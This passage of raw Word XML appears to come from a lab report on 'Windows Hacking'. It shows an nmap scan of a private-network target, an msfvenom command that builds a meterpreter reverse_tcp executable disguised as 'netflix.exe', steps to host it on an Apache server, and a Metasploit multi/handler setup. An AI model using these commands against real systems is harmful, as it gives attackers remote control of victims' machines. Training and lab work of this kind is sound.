      <w:r w:rsidRPr="004C506B">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004C506B">
        <w:t>, so we are proceeding with next step exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0430E350" w14:textId="6CBA5187" w:rsidR="00473058" w:rsidRPr="004C506B" w:rsidRDefault="00473058" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Kindly make sure to turn off the firewall of Windows OS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEA7741" w14:textId="640CF908" w:rsidR="00473058" w:rsidRPr="004C506B" w:rsidRDefault="00473058" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60BA83B1" wp14:editId="75AAD848">
            <wp:extent cx="5731510" cy="4280535"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="84381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9254" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="4280535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA7FFAA" w14:textId="65D57361" w:rsidR="002D4EDC" w:rsidRPr="004C506B" w:rsidRDefault="002D4EDC" w:rsidP="004C506B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">We need to scan open ports on Target IP address i.e., 192.168.1.36 and to do this we will use nmap. We will use the command </w:t>
      </w:r>
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“nmap –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> –O –v –P –A 192.168.1.36”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6975FF1B" w14:textId="2A0E2BF9" w:rsidR="002F5DC1" w:rsidRPr="004C506B" w:rsidRDefault="002F5DC1" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CB9ACAC" wp14:editId="7193C741">
            <wp:extent cx="5731510" cy="3221990"/>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srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3221990"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDA4071" w14:textId="636F6CA1" w:rsidR="002F5DC1" w:rsidRDefault="002F5DC1" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:t>Nmap output</w:t>
      </w:r>
      <w:r w:rsidR="002D4EDC" w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> and port </w:t>
      </w:r>
      <w:r w:rsidR="00682ACF" w:rsidRPr="004C506B">
        <w:t xml:space="preserve">139 is open for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00682ACF" w:rsidRPr="004C506B">
        <w:t>netbios-ssn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00682ACF" w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E156243" w14:textId="77777777" w:rsidR="00AE7C28" w:rsidRPr="004C506B" w:rsidRDefault="00AE7C28" w:rsidP="004C506B"/>
    <w:p w14:paraId="170C89AF" w14:textId="7483BFEE" w:rsidR="00421A75" w:rsidRPr="004C506B" w:rsidRDefault="004C506B" w:rsidP="004C506B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc148233815"/>
      <w:bookmarkStart w:id="14" w:name="_Toc148744741"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3.2 </w:t>
      </w:r>
      <w:r w:rsidR="00464B98" w:rsidRPr="004C506B">
        <w:t>Windows Hacking</w:t>
      </w:r>
      <w:r w:rsidR="00421A75" w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> – Exploitation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidR="00421A75" w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404F4BDC" w14:textId="5984E507" w:rsidR="00464B98" w:rsidRPr="004C506B" w:rsidRDefault="00464B98" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve">We need to run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004C506B">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> in root access to develop malware to get root access of target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405320AC" w14:textId="4B46020C" w:rsidR="00464B98" w:rsidRPr="004C506B" w:rsidRDefault="00464B98" w:rsidP="004C506B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C506B">
        <w:t>We will use the command “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST= &lt;attacker IP address&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00755DAE" w:rsidRPr="004C506B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> LPORT=&lt;any free port&gt; -f exe -o &lt;output file name&gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68705C1C" w14:textId="00351157" w:rsidR="00755DAE" w:rsidRPr="004C506B" w:rsidRDefault="00755DAE" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EE6E464" wp14:editId="3882148F">
            <wp:extent cx="5731510" cy="998220"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="140525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8210" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="998220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B4999E" w14:textId="33C070B0" w:rsidR="00464B98" w:rsidRPr="004C506B" w:rsidRDefault="00755DAE" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r w:rsidR="00071CCC" w:rsidRPr="004C506B">
        <w:t>our</w:t>
      </w:r>
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> case I am using </w:t>
      </w:r>
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LHOST= 192.168.1.3, LPORT=4444</w:t>
      </w:r>
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> and output file name </w:t>
      </w:r>
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>= netflix.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C3F98D" w14:textId="5C036BF2" w:rsidR="00464B98" w:rsidRPr="004C506B" w:rsidRDefault="00755DAE" w:rsidP="004C506B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Note= LHOST and LPORT information should be identical with options parameter we need to set later inside Metasploit tool, else malware will not work. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6050A608" w14:textId="47482EB4" w:rsidR="00755DAE" w:rsidRPr="004C506B" w:rsidRDefault="00755DAE" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve">So, we have created a malware now, next is to move this file to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004C506B">
        <w:t>apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> server directory</w:t>
      </w:r>
      <w:r w:rsidR="00B75DD3" w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> i.e., var/www/html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E68C1B" w14:textId="44ECD058" w:rsidR="00B75DD3" w:rsidRPr="004C506B" w:rsidRDefault="00B75DD3" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C019889" wp14:editId="3D57C009">
            <wp:extent cx="4311650" cy="692943"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8766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6518" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4331659" cy="696159"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4318AC3D" w14:textId="7B57E84C" w:rsidR="00B75DD3" w:rsidRPr="004C506B" w:rsidRDefault="00B75DD3" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve">Also, we need to perform two tasks on this file </w:t>
      </w:r>
      <w:r w:rsidR="00987937" w:rsidRPr="004C506B">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidRPr="004C506B">
        <w:t>first</w:t>
      </w:r>
      <w:r w:rsidR="00987937" w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> task</w:t>
      </w:r>
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> we need to make it an executable file </w:t>
      </w:r>
      <w:r w:rsidR="00987937" w:rsidRPr="004C506B">
        <w:t xml:space="preserve">and to do it we will use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00987937" w:rsidRPr="004C506B">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00987937" w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068D933C" w14:textId="77777777" w:rsidR="00B75DD3" w:rsidRPr="004C506B" w:rsidRDefault="00B75DD3" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B5F709D" wp14:editId="5204E743">
            <wp:extent cx="2851150" cy="751951"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="153307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4074" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2860191" cy="754335"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD5BE6A" w14:textId="7A122027" w:rsidR="00B75DD3" w:rsidRPr="004C506B" w:rsidRDefault="00B75DD3" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> and second </w:t>
      </w:r>
      <w:r w:rsidR="00987937" w:rsidRPr="004C506B">
        <w:t>task is moving</w:t>
      </w:r>
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00987937" w:rsidRPr="004C506B">
        <w:t>the executable file</w:t>
      </w:r>
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> further inside a director</w:t>
      </w:r>
      <w:r w:rsidR="00987937" w:rsidRPr="004C506B">
        <w:t>y in the same path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19696938" w14:textId="765A0195" w:rsidR="00987937" w:rsidRPr="004C506B" w:rsidRDefault="00987937" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75FBBA18" wp14:editId="6E2EF634">
            <wp:extent cx="3054350" cy="700640"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="8122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9223" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3092520" cy="709396"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFD9F91" w14:textId="4F1DB5AD" w:rsidR="00987937" w:rsidRPr="004C506B" w:rsidRDefault="00987937" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41CF807E" wp14:editId="5077A59B">
            <wp:extent cx="3033643" cy="520700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5398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0832" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3068516" cy="526686"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="085A3927" w14:textId="0FF8C559" w:rsidR="00987937" w:rsidRPr="004C506B" w:rsidRDefault="00B75DD3" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00987937" w:rsidRPr="004C506B">
        <w:t>Now we have done all the task that were necessary for the malware to get executed properly.</w:t>
      </w:r>
      <w:r w:rsidR="00071CCC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00987937" w:rsidRPr="004C506B">
        <w:t xml:space="preserve">Next is we need to start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00987937" w:rsidRPr="004C506B">
        <w:t>apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00987937" w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> server; we will use command “service apache2 start” </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618803C9" w14:textId="301B5E4F" w:rsidR="00987937" w:rsidRPr="004C506B" w:rsidRDefault="00987937" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24FDC0E3" wp14:editId="126DFBA2">
            <wp:extent cx="5731510" cy="2673350"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="15918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1940" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2673350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EB4115" w14:textId="19F66C09" w:rsidR="00577E25" w:rsidRPr="004C506B" w:rsidRDefault="00421A75" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:t>Now to run exploit we will first have to use Metasploit Framework i.e., already preinstalled on Kali Linux</w:t>
      </w:r>
      <w:r w:rsidR="00577E25" w:rsidRPr="004C506B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB2F05C" w14:textId="649DC990" w:rsidR="00577E25" w:rsidRPr="004C506B" w:rsidRDefault="00577E25" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:t>To run Metasploit Framework on Kali we will need to give a command on Terminal as “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve">” to start </w:t>
      </w:r>
      <w:r w:rsidR="00AE7C28" w:rsidRPr="004C506B">
        <w:t>its</w:t>
      </w:r>
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67413703" w14:textId="757C6D2C" w:rsidR="00577E25" w:rsidRPr="004C506B" w:rsidRDefault="00577E25" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="417523A0" wp14:editId="002C905F">
            <wp:extent cx="5731510" cy="3709670"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="1815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491" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3709670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF967A2" w14:textId="458B29C7" w:rsidR="00577E25" w:rsidRPr="004C506B" w:rsidRDefault="00577E25" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msf6</w:t>
      </w:r>
      <w:r w:rsidR="00926C8F" w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00926C8F" w:rsidRPr="004C506B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="004C506B">
        <w:t>” will be shown once Metasploit is started completely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0235B522" w14:textId="77777777" w:rsidR="00D806A2" w:rsidRPr="004C506B" w:rsidRDefault="00577E25" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve">Now, firstly we need to </w:t>
      </w:r>
      <w:r w:rsidR="00D806A2" w:rsidRPr="004C506B">
        <w:t xml:space="preserve">define exploit that we will use in this task, we will use </w:t>
      </w:r>
      <w:r w:rsidR="00D806A2" w:rsidRPr="004C506B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exploit/multi/handler</w:t>
      </w:r>
      <w:r w:rsidR="00D806A2" w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799B1BAF" w14:textId="77777777" w:rsidR="00071CCC" w:rsidRDefault="00D806A2" w:rsidP="00071CCC">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Heading1Char"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44FE9197" wp14:editId="752422E5">
            <wp:extent cx="3143412" cy="266714"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14167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520" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3143412" cy="266714"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkStart w:id="15" w:name="_Toc148233816"/>
    </w:p>
    <w:p w14:paraId="64D74BDB" w14:textId="77777777" w:rsidR="00071CCC" w:rsidRDefault="00071CCC" w:rsidP="004C506B">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Heading1Char"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08DE145A" w14:textId="00AC6DD9" w:rsidR="00071CCC" w:rsidRDefault="004C506B" w:rsidP="00071CCC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc148744742"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Heading1Char"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3.3 </w:t>
      </w:r>
      <w:r w:rsidR="001D7951" w:rsidRPr="004C506B">
        <w:rPr>
          <w:rStyle w:val="Heading1Char"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Windows Hacking – Gain Access to Root</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidR="001D7951" w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB421FE" w14:textId="6DBA0A7C" w:rsidR="00D806A2" w:rsidRPr="00071CCC" w:rsidRDefault="002F5DC1" w:rsidP="004C506B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C506B">
        <w:t>Next,</w:t>
      </w:r>
      <w:r w:rsidR="00D806A2" w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> we have to set options parameter </w:t>
      </w:r>
      <w:r w:rsidR="00D806A2" w:rsidRPr="004C506B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13395424" wp14:editId="1F77BD1E">
            <wp:extent cx="4876800" cy="3251200"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="4030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7638" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4877055" cy="3251370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F3DEAD" w14:textId="135BE9F8" w:rsidR="00D806A2" w:rsidRPr="004C506B" w:rsidRDefault="00D806A2" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:t>And make sure that both option parameter is set exactly identical to the value mentioned while developing malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B9A8C8" w14:textId="1F11E977" w:rsidR="00D806A2" w:rsidRPr="004C506B" w:rsidRDefault="00D806A2" w:rsidP="004C506B">
